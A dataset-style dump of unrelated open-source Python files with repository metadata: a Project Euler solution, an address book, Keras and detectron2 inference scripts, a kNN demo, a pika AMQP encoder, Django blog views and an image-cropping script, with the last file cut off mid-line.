"type", "schema", "count"), models.Table(client, "sample_datasets", "bar", "type", "schema", "count"), models.Table(client, "sample_datasets", "baz", "type", "schema", "count"), ]) database = models.Database(client, "sample_datasets", tables=None, count=12345, created_at="created_at", updated_at="updated_at", org_name="org_name", permission="administrator") tables = database.tables() assert [ table.name for table in tables ] == ["foo", "bar", "baz"] client.tables.assert_called_with("sample_datasets")
40.666667
202
0.713745
0
0
0
0
0
0
0
0
420
0.264817
fe31f26debb52795b22561b36355ce06ff7905d8
558
py
Python
setup.py
ballcap231/fireTS
74cc89a14d67edabf31139d1552025d54791f2a9
[ "MIT" ]
null
null
null
setup.py
ballcap231/fireTS
74cc89a14d67edabf31139d1552025d54791f2a9
[ "MIT" ]
null
null
null
setup.py
ballcap231/fireTS
74cc89a14d67edabf31139d1552025d54791f2a9
[ "MIT" ]
null
null
null
from setuptools import setup dependencies = [ 'numpy', 'scipy', 'scikit-learn', ] setup( name='fireTS', version='0.0.7', description='A python package for multi-variate time series prediction', long_description=open('README.md').read(), long_description_content_type="text/markdown", url='https://github.com/jxx123/fireTS.git', author='Jinyu Xie', author_email='[email protected]', license='MIT', packages=['fireTS'], install_requires=dependencies, include_package_data=True, zip_safe=False)
24.26087
76
0.677419
0
0
0
0
0
0
0
0
209
0.374552
fe3273d41978521818a7243089a132072ef92c5a
883
py
Python
euler/py/project_019.py
heyihan/scodes
342518b548a723916c9273d8ebc1b345a0467e76
[ "BSD-3-Clause" ]
null
null
null
euler/py/project_019.py
heyihan/scodes
342518b548a723916c9273d8ebc1b345a0467e76
[ "BSD-3-Clause" ]
null
null
null
euler/py/project_019.py
heyihan/scodes
342518b548a723916c9273d8ebc1b345a0467e76
[ "BSD-3-Clause" ]
null
null
null
# https://projecteuler.net/problem=19 def is_leap(year): if year%4 != 0: return False if year%100 == 0 and year%400 != 0: return False return True def year_days(year): if is_leap(year): return 366 return 365 def month_days(month, year): if month == 4 or month == 6 or month == 9 or month == 11: return 30 if month == 2: if is_leap(year): return 29 return 28 return 31 day_19000101 = 1 days_1900 = year_days(1900) day_next_day1 = (day_19000101 + days_1900)%7 print(day_19000101, days_1900, day_next_day1) sum = 0 for i in range(1901, 2001): for j in range(1, 13): if day_next_day1 == 0: print(i, j) sum = sum + 1 days = month_days(j, i) day_next_day1 = (day_next_day1 + days)%7 #print(i, j, days, day_next_day1) print(sum)
20.534884
61
0.582106
0
0
0
0
0
0
0
0
70
0.079275
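The counting logic above can be cross-checked against Python's standard library; a short sketch using datetime, independent of the hand-rolled leap-year and month-length helpers:

from datetime import date

# Count Sundays falling on the first of a month, 1901-2000 inclusive.
# date.weekday() returns 6 for Sunday.
sundays = sum(
    1
    for year in range(1901, 2001)
    for month in range(1, 13)
    if date(year, month, 1).weekday() == 6
)
print(sundays)  # expected to match the `sum` printed by the script above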
fe32cc9e555895354fe2279db255494d9b4433fb
1,652
py
Python
address_book/address_book.py
wowsuchnamaste/address_book
4877d16d795c54b750e151fa93e69c080717ae72
[ "MIT" ]
null
null
null
address_book/address_book.py
wowsuchnamaste/address_book
4877d16d795c54b750e151fa93e69c080717ae72
[ "MIT" ]
null
null
null
address_book/address_book.py
wowsuchnamaste/address_book
4877d16d795c54b750e151fa93e69c080717ae72
[ "MIT" ]
null
null
null
"""A simple address book.""" from ._tools import generate_uuid class AddressBook: """ A simple address book. """ def __init__(self): self._entries = [] def add_entry(self, entry): """Add an entry to the address book.""" self._entries.append(entry) def get_entries(self): """Returns a list of all entries in the address book. :return: ``list`` of ``Person`` objects. """ return self._entries def get_entry(self, name): entry = [entry for entry in self._entries if entry.name == name] return entry[0] class Entry: def __init__( self, name, first_name=None, last_name=None, address=None, phone_number=None, email=None, organization=None, ): self._uuid = generate_uuid() self.name = name self.first_name = first_name self.last_name = last_name self._parse_name(name) self.address = address self.phone_number = phone_number self.email = email self.organization = organization def __repr__(self): return self.name def _parse_name(self, name): """ Parse whatever is passed as ``name`` and update ``self.name`` from that. :param name: A person's name as string or dictionary. :return: The method doesn't return anything. """ if type(name) == dict: self.first_name = name["first_name"] self.last_name = name["last_name"] self.name = self.first_name + " " + self.last_name
25.415385
80
0.565981
1,583
0.958232
0
0
0
0
0
0
458
0.27724
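A brief usage sketch of the classes above; the import path is assumed from the repo layout (address_book/address_book.py) and the names and values are invented for illustration:

# Assumed import, based on the package layout shown above:
# from address_book.address_book import AddressBook, Entry
book = AddressBook()

# A plain string name is stored as-is.
book.add_entry(Entry("Ada Lovelace", email="[email protected]"))

# A dict name is split into first/last and joined back into `name`.
book.add_entry(Entry({"first_name": "Alan", "last_name": "Turing"}))

assert book.get_entry("Alan Turing").first_name == "Alan"
assert [str(e) for e in book.get_entries()] == ["Ada Lovelace", "Alan Turing"]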
fe3415df5ab13d93fe351122344f2bd2d2fe4c5f
3,839
py
Python
inference.py
zzhang87/ChestXray
eaafe2f7f5e91bb30fbed02dec1f77ff314434b5
[ "MIT" ]
null
null
null
inference.py
zzhang87/ChestXray
eaafe2f7f5e91bb30fbed02dec1f77ff314434b5
[ "MIT" ]
11
2020-01-28T21:44:26.000Z
2022-03-11T23:19:37.000Z
inference.py
zzhang87/ChestXray
eaafe2f7f5e91bb30fbed02dec1f77ff314434b5
[ "MIT" ]
null
null
null
import keras import numpy as np import pandas as pd import cv2 import os import json import pdb import argparse import math import copy from vis.visualization import visualize_cam, overlay, visualize_activation from vis.utils.utils import apply_modifications from shutil import rmtree import matplotlib.cm as cm from matplotlib import pyplot as plt from sklearn import metrics import keras.backend as K from keras import activations from keras.applications.inception_v3 import preprocess_input as inception_pre from keras.applications.mobilenet import preprocess_input as mobilenet_pre from keras.applications.resnet50 import preprocess_input as resnet_pre from keras.applications.densenet import preprocess_input as densenet_pre from datagenerator import ImageDataGenerator from utils import load_model def getCAM(model, image): # weights of the final fully-connected layer weights = model.layers[-1].get_weights()[0] # activation before the last global pooling for layer in reversed(model.layers): if len(layer.output_shape) > 2: break function = K.function([model.layers[0].input, K.learning_phase()], [layer.output]) activation = np.squeeze(function([image, 0])[0]) # weighted sum of the activation map CAM = np.dot(activation, weights) return CAM def main(): ap = argparse.ArgumentParser() ap.add_argument('--ckpt_path', help = 'Path to the model checkpoint.') ap.add_argument('--image_path', help = 'Path to the image to run inference on.') ap.add_argument('--bnbox', help = 'Path to the bounding box annotation, if applies.') ap.add_argument('--threshold', default = 0.5, help = 'Threshold for displaying the Class Activation Map.') args = ap.parse_args() model_dir = os.path.dirname(args.ckpt_path) with open(os.path.join(model_dir, 'label_map.json'), 'r') as f: label_map = json.load(f) num_class = len(list(label_map.keys())) model, model_config = load_model(model_dir, args.ckpt_path) model_name = model_config['model_name'] if model_name in ['inception']: image_size = 299 else: image_size = 224 preprocess_input = { 'inception': inception_pre, 'resnet': resnet_pre, 'mobilenet': mobilenet_pre, 'densenet': densenet_pre } if args.bnbox is not None: annotation = pd.read_csv(args.bnbox) image_index = os.path.basename(args.image_path) indices = np.where(annotation['Image Index'] == image_index)[0] bnbox = {} for i in indices: disease = annotation['Finding Label'][i] x = int(annotation['Bbox [x'][i] + 0.5) y = int(annotation['y'][i] + 0.5) w = int(annotation['w'][i] + 0.5) h = int(annotation['h]'][i] + 0.5) bnbox[disease] = [x, y, x + w, y + h] image = cv2.imread(args.image_path) img = cv2.resize(image, (image_size, image_size)) img = preprocess_input[model_name](img.astype(np.float32)) img = np.expand_dims(img, axis = 0) predictions = np.squeeze(model.predict(img)) CAM = getCAM(model, img) cv2.namedWindow("ChestXray", cv2.WINDOW_NORMAL) for key, value in label_map.items(): heatmap = CAM[:,:,int(key)] heatmap -= heatmap.min() heatmap *= 255.0 / heatmap.max() heatmap[np.where(heatmap < args.threshold * 255)] *= 0.1 heatmap = cv2.applyColorMap(heatmap.astype(np.uint8), cv2.COLORMAP_JET) heatmap = cv2.resize(heatmap, image.shape[:2], cv2.INTER_AREA) overlay_img = overlay(heatmap, image, alpha = 0.4) cv2.putText(overlay_img, "{}: {:.2%}".format(value, predictions[int(key)]), (30,30), cv2.FONT_HERSHEY_DUPLEX, 1.0, (255,255,255), 2) if value in bnbox.keys(): box = bnbox[value] cv2.rectangle(overlay_img, (box[0], box[1]), (box[2], box[3]), color = (0, 180, 0), thickness = 2) cv2.imshow("ChestXray", overlay_img) cv2.waitKey() 
plt.show() print('{}: {:.2%}'.format(value, predictions[int(key)])) cv2.destroyAllWindows() if __name__ == "__main__": main()
27.035211
107
0.716593
0
0
0
0
0
0
0
0
530
0.138057
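The class-activation-map step in getCAM above is a weighted sum over the last convolutional feature map; a shape-only numpy sketch, where random numbers stand in for real activations and weights and the sizes are illustrative:

import numpy as np

h, w, channels, num_classes = 7, 7, 1024, 14      # illustrative sizes only
activation = np.random.rand(h, w, channels)       # feature map before global pooling
weights = np.random.rand(channels, num_classes)   # final dense-layer weights

# Same operation as getCAM: one h x w heat map per class.
cam = np.dot(activation, weights)
assert cam.shape == (h, w, num_classes)

# A per-class map is then min-max scaled before overlaying, as in main().
heatmap = cam[:, :, 0]
heatmap = (heatmap - heatmap.min()) / (heatmap.max() - heatmap.min())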
fe34376d96d5593399f4f9364cf5da83ea7d813b
530
py
Python
test/DQueueTest.py
MistSun-Chen/py_verifier
7e9161d1fdbb611fe4be5eeb2f89a6286fa7b555
[ "MIT" ]
null
null
null
test/DQueueTest.py
MistSun-Chen/py_verifier
7e9161d1fdbb611fe4be5eeb2f89a6286fa7b555
[ "MIT" ]
null
null
null
test/DQueueTest.py
MistSun-Chen/py_verifier
7e9161d1fdbb611fe4be5eeb2f89a6286fa7b555
[ "MIT" ]
null
null
null
from libTask import Queue from common import configParams from common import common def main(): cp = configParams.ConfigParams("config.json") detectGeneralQueue = Queue.DQueue(cp, len(cp.detect_general_ids), cp.modelPath, common.GENERALDETECT_METHOD_ID, cp.GPUDevices, cp.detect_general_ids) print("Run Into Next step") smokeQueue = Queue.DQueue(cp, len(cp.smoke_ids), cp.modelPath, common.PEOPLESMOKE_METHOD_ID,cp.GPUDevices, cp.smoke_ids) if __name__ == '__main__': main()
35.333333
124
0.718868
0
0
0
0
0
0
0
0
43
0.081132
fe358e9590f17c8d7c10eb92232dc2f7d4b20167
235
py
Python
config.py
volgachen/Chinese-Tokenization
467e08da6fe271b6e33258d5aa6682c0405a3f32
[ "Apache-2.0" ]
null
null
null
config.py
volgachen/Chinese-Tokenization
467e08da6fe271b6e33258d5aa6682c0405a3f32
[ "Apache-2.0" ]
null
null
null
config.py
volgachen/Chinese-Tokenization
467e08da6fe271b6e33258d5aa6682c0405a3f32
[ "Apache-2.0" ]
1
2020-07-12T10:38:34.000Z
2020-07-12T10:38:34.000Z
class Config: ngram = 2 train_set = "data/rmrb.txt" modified_train_set = "data/rmrb_modified.txt" test_set = "" model_file = "" param_file = "" word_max_len = 10 proposals_keep_ratio = 1.0 use_re = 1 subseq_num = 15
21.363636
47
0.67234
235
1
0
0
0
0
0
0
45
0.191489
fe3599447ec843cd5c9296bccc205dff470707c7
1,417
py
Python
src/Knn-Tensor.py
python-itb/knn-from-scratch
dbc6fb53cffb245a76d35b9ff85ac8cb21877ca8
[ "MIT" ]
null
null
null
src/Knn-Tensor.py
python-itb/knn-from-scratch
dbc6fb53cffb245a76d35b9ff85ac8cb21877ca8
[ "MIT" ]
2
2018-03-20T06:47:32.000Z
2018-10-25T10:54:08.000Z
src/Knn-Tensor.py
python-itb/knn-from-scratch
dbc6fb53cffb245a76d35b9ff85ac8cb21877ca8
[ "MIT" ]
4
2018-03-20T06:43:11.000Z
2019-04-15T16:34:28.000Z
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Tue Feb 13 18:52:28 2018 @author: amajidsinar """ from sklearn import datasets import matplotlib.pyplot as plt import numpy as np plt.style.use('seaborn-white') iris = datasets.load_iris() dataset = iris.data # only take 0th and 1th column for X data_known = iris.data[:,:2] # y label_known = iris.target # the hard part # so matplotlib does not readily support labeling based on class # but we know that one of the feature of plt is that a plt call would give those set of number # the same color category = np.unique(label_known) for i in category: plt.scatter(data_known[label_known==i][:,0],data_known[label_known==i][:,1],label=i) # Unknown class of a data data_unknown = np.array([[5.7,3.3],[5.6,3.4],[6.4,3],[8.2,2.2]]) plt.scatter(data_unknown[:,0],data_unknown[:,1], label='?') plt.legend() #------------- # Euclidean Distance diff = data_known - data_unknown.reshape(data_unknown.shape[0],1,data_unknown.shape[1]) distance = (diff**2).sum(2) #return sorted index of distance dist_index = np.argsort(distance) label = label_known[dist_index] #for k in [1,2,3,4,5,6,7,8,9,10]: #keep the rank k = 10 label = label[:,:k] label_predict = [] for i in range(data_unknown.shape[0]): values,counts = np.unique(label[i], return_counts=True) ind = np.argmax(counts) label_predict.append(values[ind])
21.149254
94
0.687368
0
0
0
0
0
0
0
0
494
0.348624
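The distance computation above relies on numpy broadcasting; a compact sketch of the same pattern with tiny made-up arrays, plus the majority vote via np.unique:

import numpy as np

data_known = np.array([[1.0, 1.0], [2.0, 2.0], [9.0, 9.0], [8.5, 8.5]])
label_known = np.array([0, 0, 1, 1])
data_unknown = np.array([[1.5, 1.5], [8.0, 8.0]])

# (4, 2) minus (2, 1, 2) broadcasts to (2, 4, 2): one block of diffs per query point.
diff = data_known - data_unknown.reshape(data_unknown.shape[0], 1, data_unknown.shape[1])
distance = (diff ** 2).sum(2)                 # squared Euclidean distances, shape (2, 4)

k = 2
nearest = label_known[np.argsort(distance)][:, :k]   # labels of the k nearest neighbours

# Majority vote per query, as in the loop above.
label_predict = []
for row in nearest:
    values, counts = np.unique(row, return_counts=True)
    label_predict.append(int(values[np.argmax(counts)]))
print(label_predict)   # [0, 1]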
fe35a3606e5ec595f8753af44fd793743da1ae33
2,135
py
Python
de_test_tron2.py
volpepe/detectron2-ResNeSt
1481d50880baa615b873b7a18156c06a5606a85c
[ "Apache-2.0" ]
null
null
null
de_test_tron2.py
volpepe/detectron2-ResNeSt
1481d50880baa615b873b7a18156c06a5606a85c
[ "Apache-2.0" ]
null
null
null
de_test_tron2.py
volpepe/detectron2-ResNeSt
1481d50880baa615b873b7a18156c06a5606a85c
[ "Apache-2.0" ]
null
null
null
import torch, torchvision
import detectron2
from detectron2.utils.logger import setup_logger
setup_logger()

# import some common libraries
import numpy as np
import os, json, cv2, random

# import some common detectron2 utilities
from detectron2 import model_zoo
from detectron2.engine import DefaultPredictor
from detectron2.config import get_cfg
from detectron2.utils.visualizer import Visualizer
from detectron2.data import MetadataCatalog, DatasetCatalog

import argparse, time

def parse_args():
    p = argparse.ArgumentParser()
    p.add_argument("-i", "--image", type=str, help="Path to image to segment")
    p.add_argument("-m", "--model", type=str, help="Model to use", default="COCO-InstanceSegmentation/mask_cascade_rcnn_ResNeSt_200_FPN_syncBN_all_tricks_3x.yaml")
    p.add_argument("-t", "--threshold", type=float, help="Threshold for model detections", default=0.4)
    p.add_argument("-rs", "--use_resnest", type=bool, help="Whether the selected model uses ResNeSt backbone or not", default=True)
    return p.parse_args()

def start_segment(args):
    img = args.image
    model = args.model
    thresh = args.threshold
    use_resnest = args.use_resnest

    im = cv2.imread(img)
    # get default cfg file
    cfg = get_cfg()
    # replace cfg from specific model yaml file
    cfg.merge_from_file(model_zoo.get_config_file(model))
    cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = thresh # set threshold for this model
    # Find a model from detectron2's model zoo. You can use the https://dl.fbaipublicfiles... url as well
    cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(model, resnest=use_resnest)
    predictor = DefaultPredictor(cfg)
    start = time.time()
    outputs = predictor(im)
    print("Time elapsed: {}".format(time.time() - start))

    v = Visualizer(im[:, :, ::-1], MetadataCatalog.get(cfg.DATASETS.TRAIN[0]), scale=1.2) #rgb image (::-1)
    out = v.draw_instance_predictions(outputs["instances"].to("cpu"))
    cv2.imwrite("output.jpg", out.get_image()[:, :, ::-1])

if __name__ == "__main__":
    args = parse_args()
    start_segment(args)
40.283019
164
0.710539
0
0
0
0
0
0
0
0
625
0.29274
fe35e371f2d0a2c205ae69e2ee6c811fd9ed1de5
8,916
py
Python
pika/data.py
Pankrat/pika
9f62cbe032e9b4fa0fe1842587ce0702c3926a3d
[ "BSD-3-Clause" ]
null
null
null
pika/data.py
Pankrat/pika
9f62cbe032e9b4fa0fe1842587ce0702c3926a3d
[ "BSD-3-Clause" ]
null
null
null
pika/data.py
Pankrat/pika
9f62cbe032e9b4fa0fe1842587ce0702c3926a3d
[ "BSD-3-Clause" ]
null
null
null
"""AMQP Table Encoding/Decoding""" import struct import decimal import calendar from datetime import datetime from pika import exceptions from pika.compat import unicode_type, PY2, long, as_bytes def encode_short_string(pieces, value): """Encode a string value as short string and append it to pieces list returning the size of the encoded value. :param list pieces: Already encoded values :param value: String value to encode :type value: str or unicode :rtype: int """ encoded_value = as_bytes(value) length = len(encoded_value) # 4.2.5.3 # Short strings, stored as an 8-bit unsigned integer length followed by zero # or more octets of data. Short strings can carry up to 255 octets of UTF-8 # data, but may not contain binary zero octets. # ... # 4.2.5.5 # The server SHOULD validate field names and upon receiving an invalid field # name, it SHOULD signal a connection exception with reply code 503 (syntax # error). # -> validate length (avoid truncated utf-8 / corrupted data), but skip null # byte check. if length > 255: raise exceptions.ShortStringTooLong(encoded_value) pieces.append(struct.pack('B', length)) pieces.append(encoded_value) return 1 + length if PY2: def decode_short_string(encoded, offset): """Decode a short string value from ``encoded`` data at ``offset``. """ length = struct.unpack_from('B', encoded, offset)[0] offset += 1 # Purely for compatibility with original python2 code. No idea what # and why this does. value = encoded[offset:offset + length] try: value = bytes(value) except UnicodeEncodeError: pass offset += length return value, offset else: def decode_short_string(encoded, offset): """Decode a short string value from ``encoded`` data at ``offset``. """ length = struct.unpack_from('B', encoded, offset)[0] offset += 1 value = encoded[offset:offset + length].decode('utf8') offset += length return value, offset def encode_table(pieces, table): """Encode a dict as an AMQP table appending the encded table to the pieces list passed in. :param list pieces: Already encoded frame pieces :param dict table: The dict to encode :rtype: int """ table = table or {} length_index = len(pieces) pieces.append(None) # placeholder tablesize = 0 for (key, value) in table.items(): tablesize += encode_short_string(pieces, key) tablesize += encode_value(pieces, value) pieces[length_index] = struct.pack('>I', tablesize) return tablesize + 4 def encode_value(pieces, value): """Encode the value passed in and append it to the pieces list returning the the size of the encoded value. 
:param list pieces: Already encoded values :param any value: The value to encode :rtype: int """ if PY2: if isinstance(value, basestring): if isinstance(value, unicode_type): value = value.encode('utf-8') pieces.append(struct.pack('>cI', b'S', len(value))) pieces.append(value) return 5 + len(value) else: # support only str on Python 3 if isinstance(value, str): value = value.encode('utf-8') pieces.append(struct.pack('>cI', b'S', len(value))) pieces.append(value) return 5 + len(value) if isinstance(value, bool): pieces.append(struct.pack('>cB', b't', int(value))) return 2 if isinstance(value, long): pieces.append(struct.pack('>cq', b'l', value)) return 9 elif isinstance(value, int): pieces.append(struct.pack('>ci', b'I', value)) return 5 elif isinstance(value, decimal.Decimal): value = value.normalize() if value.as_tuple().exponent < 0: decimals = -value.as_tuple().exponent raw = int(value * (decimal.Decimal(10) ** decimals)) pieces.append(struct.pack('>cBi', b'D', decimals, raw)) else: # per spec, the "decimals" octet is unsigned (!) pieces.append(struct.pack('>cBi', b'D', 0, int(value))) return 6 elif isinstance(value, datetime): pieces.append(struct.pack('>cQ', b'T', calendar.timegm(value.utctimetuple()))) return 9 elif isinstance(value, dict): pieces.append(struct.pack('>c', b'F')) return 1 + encode_table(pieces, value) elif isinstance(value, list): p = [] for v in value: encode_value(p, v) piece = b''.join(p) pieces.append(struct.pack('>cI', b'A', len(piece))) pieces.append(piece) return 5 + len(piece) elif value is None: pieces.append(struct.pack('>c', b'V')) return 1 else: raise exceptions.UnsupportedAMQPFieldException(pieces, value) def decode_table(encoded, offset): """Decode the AMQP table passed in from the encoded value returning the decoded result and the number of bytes read plus the offset. :param str encoded: The binary encoded data to decode :param int offset: The starting byte offset :rtype: tuple """ result = {} tablesize = struct.unpack_from('>I', encoded, offset)[0] offset += 4 limit = offset + tablesize while offset < limit: key, offset = decode_short_string(encoded, offset) value, offset = decode_value(encoded, offset) result[key] = value return result, offset def decode_value(encoded, offset): """Decode the value passed in returning the decoded value and the number of bytes read in addition to the starting offset. 
:param str encoded: The binary encoded data to decode :param int offset: The starting byte offset :rtype: tuple :raises: pika.exceptions.InvalidFieldTypeException """ # slice to get bytes in Python 3 and str in Python 2 kind = encoded[offset:offset + 1] offset += 1 # Bool if kind == b't': value = struct.unpack_from('>B', encoded, offset)[0] value = bool(value) offset += 1 # Short-Short Int elif kind == b'b': value = struct.unpack_from('>B', encoded, offset)[0] offset += 1 # Short-Short Unsigned Int elif kind == b'B': value = struct.unpack_from('>b', encoded, offset)[0] offset += 1 # Short Int elif kind == b'U': value = struct.unpack_from('>h', encoded, offset)[0] offset += 2 # Short Unsigned Int elif kind == b'u': value = struct.unpack_from('>H', encoded, offset)[0] offset += 2 # Long Int elif kind == b'I': value = struct.unpack_from('>i', encoded, offset)[0] offset += 4 # Long Unsigned Int elif kind == b'i': value = struct.unpack_from('>I', encoded, offset)[0] offset += 4 # Long-Long Int elif kind == b'L': value = long(struct.unpack_from('>q', encoded, offset)[0]) offset += 8 # Long-Long Unsigned Int elif kind == b'l': value = long(struct.unpack_from('>Q', encoded, offset)[0]) offset += 8 # Float elif kind == b'f': value = long(struct.unpack_from('>f', encoded, offset)[0]) offset += 4 # Double elif kind == b'd': value = long(struct.unpack_from('>d', encoded, offset)[0]) offset += 8 # Decimal elif kind == b'D': decimals = struct.unpack_from('B', encoded, offset)[0] offset += 1 raw = struct.unpack_from('>i', encoded, offset)[0] offset += 4 value = decimal.Decimal(raw) * (decimal.Decimal(10) ** -decimals) # Short String elif kind == b's': value, offset = decode_short_string(encoded, offset) # Long String elif kind == b'S': length = struct.unpack_from('>I', encoded, offset)[0] offset += 4 value = encoded[offset:offset + length].decode('utf8') offset += length # Field Array elif kind == b'A': length = struct.unpack_from('>I', encoded, offset)[0] offset += 4 offset_end = offset + length value = [] while offset < offset_end: v, offset = decode_value(encoded, offset) value.append(v) # Timestamp elif kind == b'T': value = datetime.utcfromtimestamp(struct.unpack_from('>Q', encoded, offset)[0]) offset += 8 # Field Table elif kind == b'F': (value, offset) = decode_table(encoded, offset) # Null / Void elif kind == b'V': value = None else: raise exceptions.InvalidFieldTypeException(kind) return value, offset
30.534247
80
0.596456
0
0
0
0
0
0
0
0
2,707
0.303611
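A tiny round-trip sketch of the short-string framing described by encode_short_string/decode_short_string above (one length octet followed by UTF-8 data, at most 255 octets), using only the standard struct module:

import struct

def pack_short_string(value):
    data = value.encode("utf-8")
    if len(data) > 255:                      # same limit the module enforces
        raise ValueError("short string too long")
    return struct.pack("B", len(data)) + data

def unpack_short_string(buf, offset=0):
    length = struct.unpack_from("B", buf, offset)[0]
    offset += 1
    return buf[offset:offset + length].decode("utf-8"), offset + length

encoded = pack_short_string("x-match")
decoded, end = unpack_short_string(encoded)
assert decoded == "x-match" and end == len(encoded)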
fe372dac70d64a37ad3e688bb47fa5b1bd4ad42e
528
py
Python
tests/fixtures/data_sets/service/dummy/dummy_configurable.py
Agi-dev/pylaas_core
c44866b5e57eb6f05f5b2b8d731f22d62a8c01c2
[ "MIT" ]
null
null
null
tests/fixtures/data_sets/service/dummy/dummy_configurable.py
Agi-dev/pylaas_core
c44866b5e57eb6f05f5b2b8d731f22d62a8c01c2
[ "MIT" ]
2
2021-03-25T21:30:41.000Z
2021-06-01T21:25:37.000Z
tests/fixtures/data_sets/service/dummy/dummy_configurable.py
Agi-dev/pylaas_core
c44866b5e57eb6f05f5b2b8d731f22d62a8c01c2
[ "MIT" ]
null
null
null
from pylaas_core.abstract.abstract_service import AbstractService import time from pylaas_core.interface.technical.container_configurable_aware_interface import ContainerConfigurableAwareInterface class DummyConfigurable(AbstractService, ContainerConfigurableAwareInterface): def __init__(self) -> None: super().__init__() self._microtime = int(round(time.time() * 1000)) self._configs = None def set_configs(self, configurations): self._configs = configurations return self
31.058824
118
0.765152
327
0.619318
0
0
0
0
0
0
0
0
fe3845f60103709c0d0030d388891565874650ad
1,076
py
Python
blogtech/src/blog/views.py
IVAN-URBACZKA/django-blog
7ef6050c0de2938791843c3ec93e6e6a1e683baa
[ "MIT" ]
null
null
null
blogtech/src/blog/views.py
IVAN-URBACZKA/django-blog
7ef6050c0de2938791843c3ec93e6e6a1e683baa
[ "MIT" ]
null
null
null
blogtech/src/blog/views.py
IVAN-URBACZKA/django-blog
7ef6050c0de2938791843c3ec93e6e6a1e683baa
[ "MIT" ]
null
null
null
from django.urls import reverse_lazy, reverse from django.utils.decorators import method_decorator from django.views.generic import ListView, DetailView, CreateView, DeleteView, UpdateView from .models import BlogPost from django.contrib.auth.decorators import login_required class BlogPostHomeView(ListView): model = BlogPost context_object_name = "posts" class BlogPostDetailsView(DetailView): model = BlogPost context_object_name = "post" @method_decorator(login_required, name='dispatch') class BlogPostCreateView(CreateView): model = BlogPost fields = ['title', 'image','author', 'category', 'content'] def get_success_url(self): return reverse('posts:home') @method_decorator(login_required, name='dispatch') class BlogPostUpdateView(UpdateView): model = BlogPost fields = ['title', 'author', 'category', 'content'] template_name = 'blog/blogpost_update.html' @method_decorator(login_required, name='dispatch') class BlogPostDeleteView(DeleteView): model = BlogPost success_url = reverse_lazy('posts:home')
31.647059
89
0.760223
636
0.591078
0
0
609
0.565985
0
0
169
0.157063
fe393898f4084fe1c0d82dbb19e8e9bf170a60ea
4,514
py
Python
apc_deep_vision/python/generate_data.py
Juxi/apb-baseline
fd47a5fd78cdfd75c68601a40ca4726d7d20c9ce
[ "BSD-3-Clause" ]
9
2017-02-06T10:24:56.000Z
2022-02-27T20:59:52.000Z
apc_deep_vision/python/generate_data.py
Juxi/apb-baseline
fd47a5fd78cdfd75c68601a40ca4726d7d20c9ce
[ "BSD-3-Clause" ]
null
null
null
apc_deep_vision/python/generate_data.py
Juxi/apb-baseline
fd47a5fd78cdfd75c68601a40ca4726d7d20c9ce
[ "BSD-3-Clause" ]
2
2017-10-15T08:33:37.000Z
2019-03-05T07:29:38.000Z
#! /usr/bin/env python # ******************************************************************** # Software License Agreement (BSD License) # # Copyright (c) 2015, University of Colorado, Boulder # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # * Neither the name of the University of Colorado Boulder # nor the names of its contributors may be # used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # ********************************************************************/ import cv2 import os import numpy as np if __name__ == '__main__': import argparse parser = argparse.ArgumentParser() parser.add_argument("proposal_path", type=str, help="relative path from python script to proposals, no slash") parser.add_argument("--view", default=None, help="true/1 shows each masked image") args = parser.parse_args() # args.proposal_path = "../test_proposals" # args.proposal_path = args.proposal_path included_extenstions = ['txt'] image_names = [fn[0:len(fn)-4] for fn in os.listdir(args.proposal_path) if any(fn.endswith(ext) for ext in included_extenstions)] for image_name in image_names: load_path = args.proposal_path + '/' + image_name image = cv2.imread(load_path + ".jpeg") data = np.loadtxt(load_path + ".txt", str) # If there is only one line, force data to be a list of lists anyway # Note, only works for our data as first list item is a string if isinstance(data[0], basestring): data = [data] # If any line does not conform to classification tl_x tl_y br_x br_y # then forget about it skip = False for line in data: if len(line) < 5: skip = True if skip: continue for i, proposal in zip(range(0,len(data)),data): mask = cv2.imread(load_path + '_mask{0:04d}.jpeg'.format(i)) mask = np.invert(mask) maskGray = cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY) ret, maskGray = cv2.threshold(maskGray,128,255,cv2.THRESH_BINARY) print load_path + '_mask{0:04d}.jpeg'.format(i) cropped = image[float(proposal[2]):float(proposal[4]), float(proposal[1]):float(proposal[3])] masked = cv2.bitwise_and(cropped, cropped, mask = maskGray) if args.view: cv2.imshow("original", masked) cv2.waitKey(0) mask_directory = args.proposal_path + '/masked/' + proposal[0]; crop_directory = args.proposal_path + '/cropped/' + proposal[0]; if not 
os.path.exists(mask_directory): os.makedirs(mask_directory) if not os.path.exists(crop_directory): os.makedirs(crop_directory) cv2.imwrite(mask_directory + '/{}_{}.jpeg'.format(image_name,i), masked) cv2.imwrite(crop_directory + '/{}_{}.jpeg'.format(image_name,i), cropped) # item = data[] # cropped = image[70:170, 440:540] # startY:endY, startX:endX # startX:startY, endX:endY #
37.932773
105
0.634914
0
0
0
0
0
0
0
0
2,437
0.539876
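The crop-and-mask step above combines a bounding-box crop with a binary mask via cv2.bitwise_and; an equivalent numpy-only sketch of the same idea, with a synthetic image and mask so no image files are needed:

import numpy as np

image = np.random.randint(0, 256, size=(200, 200, 3), dtype=np.uint8)

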